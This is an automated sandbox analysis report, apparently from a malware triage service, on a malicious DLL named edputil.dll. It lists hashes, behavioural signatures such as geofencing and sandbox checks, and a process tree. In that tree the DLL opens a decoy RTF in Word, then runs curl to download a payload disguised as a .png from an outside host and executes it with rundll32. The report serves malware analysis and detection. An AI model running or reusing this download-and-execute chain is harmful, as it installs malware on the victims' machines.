Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/03/2024, 18:48

General

  • Target

    edputil.dll

  • Size

    95KB

  • MD5

    4b46474e51d8687190e4e539b6691f9a

  • SHA1

    7f32b12ba975205e29b113a000dc87758e5deaf2

  • SHA256

    905a3a144f94a38ac6059759879caec19cff446b98c24bb2035b3293330e03b2

  • SHA512

    85eafcdbdffc2ca88f89a7078664dfbd00356f1dc7d1de1848ec5c7e162748132834b8d59f0df658eb31a8640494ef8c309b005c628d871c5f52b84bb5d1f7e0

  • SSDEEP

    1536:ebCgj6dJEkgOzOk3+oLGzFjO8n2dtkosu31Mv:RDzPJL2mXQ

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\edputil.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3652
    • C:\Windows\system32\cmd.exe
      cmd /c data\document.rtf
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1208
      • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\data\document.rtf" /o ""
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:1468
    • C:\Windows\system32\cmd.exe
      cmd.exe /c md c:\wnd
      2⤵
        PID:432
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl.exe --output c:\wnd\3291.png --url https://yourunitedlaws.com/mrD/4462
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\system32\curl.exe
          curl.exe --output c:\wnd\3291.png --url https://yourunitedlaws.com/mrD/4462
          3⤵
            PID:3812
        • C:\Windows\system32\rundll32.exe
          rundll32 c:\wnd\3291.png,GetModuleProp
          2⤵
            PID:2908

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/1468-13-0x00007FF99D850000-0x00007FF99D860000-memory.dmp

                Filesize

                64KB

              • memory/1468-17-0x00007FF99D850000-0x00007FF99D860000-memory.dmp

                Filesize

                64KB

              • memory/1468-3-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-2-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-4-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-5-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-6-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-7-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-8-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-9-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-19-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-11-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-12-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-14-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-15-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-16-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-1-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-0-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-10-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-18-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-20-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-21-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-67-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-37-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-38-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-39-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-60-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-61-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-63-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-64-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-62-0x00007FF9A0070000-0x00007FF9A0080000-memory.dmp

                Filesize

                64KB

              • memory/1468-65-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/1468-66-0x00007FF9DFFF0000-0x00007FF9E01E5000-memory.dmp

                Filesize

                2.0MB

              • memory/3652-30-0x00007FF9D72E0000-0x00007FF9D7300000-memory.dmp

                Filesize

                128KB